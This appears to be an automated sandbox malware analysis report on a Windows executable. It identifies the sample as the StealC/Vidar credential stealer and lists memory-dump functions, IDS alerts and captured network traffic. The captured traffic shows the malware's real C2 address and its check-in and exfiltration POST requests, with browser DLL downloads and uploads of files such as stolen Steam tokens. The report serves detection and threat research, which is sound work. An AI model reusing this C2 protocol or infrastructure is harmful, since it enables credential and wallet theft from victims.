Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 14c0ae3cb1e13de8775141fc483ca01c149d0d3866aa38b7a4dfd4766a03f8ee
Instruction ID: 620065808aa16eae8b726627722f2f2ab20b0d9d208ef9703a21026ae9e1f1b4
Opcode Fuzzy Hash: 14c0ae3cb1e13de8775141fc483ca01c149d0d3866aa38b7a4dfd4766a03f8ee
Instruction Fuzzy Hash: F1F01975E4420AABDF10DFA8DC49F9E77F9AB48710F1082A8A651A72C0D6709A018B64

Function 00B9C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00B9C74E

Part of subcall function 00B9BF9F: __amsg_exit.LIBCMT ref: 00B9BFAF

__getptd.LIBCMT ref: 00B9C765
__amsg_exit.LIBCMT ref: 00B9C773
__updatetlocinfoEx_nolock.LIBCMT ref: 00B9C797

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: f1fd0064cc160ee2fbf1c7a7a770bea4ce8090c9dd7337f92f8ab7bce279c187
Instruction ID: 286d016296ec4409d5d6c510e0b1d0af83936edd132884d5b5fc72ea5e28cc05
Opcode Fuzzy Hash: f1fd0064cc160ee2fbf1c7a7a770bea4ce8090c9dd7337f92f8ab7bce279c187
Instruction Fuzzy Hash: 71F09A329046009BDF21BBF8A947F5E3BE0AF00720F2141E9F414A72E3DF685D409E9A

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware

Source: 0.2.file.exe.b80000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.b80000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B89B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00B89B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_00B8C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B89AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00B89AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B87240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00B87240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B98EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00B98EA0

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49731 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49731 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49731
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49731 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49731
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49731 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 41 41 33 35 44 42 46 32 45 45 34 31 38 36 36 34 38 36 36 33 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="hwid"2AA35DBF2EE41866486636------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="build"doma------EGDBFIIECBGDGDGDHCAK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGHJDBFIIDGDHIJDBGHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------FHCGHJDBFIIDGDHIJDBGContent-Disposition: form-data; name="message"browsers------FHCGHJDBFIIDGDHIJDBG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="message"plugins------AAEBAFBGIDHCBFHIECFC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHIHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="message"fplugins------GIJKKKFCFHCFIECBGDHI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKFHost: 185.215.113.37Content-Length: 5571Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCFIEBKEGHIDGCAFBFHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFIJKKEHJDHJKFIECAHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 2d 2d 0d 0a Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="file"------CBFBGCGIJKJJKFIDBFCG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHIHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 41 45 42 47 43 41 41 46 49 44 47 43 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHDAEBGCAAFIDGCGDHIContent-Disposition: form-data; name="file"------GDHDAEBGCAAFIDGCGDHI--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="message"wallets------ECGDHDHJEBGHJKFIECBG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHIHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="message"files------GIJKKKFCFHCFIECBGDHI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKFHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 2d 2d 0d 0a Data Ascii: ------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="file"------JKJECBAAAFHIIEBFCBKF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAKJDGHIIJJKFHCFCAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 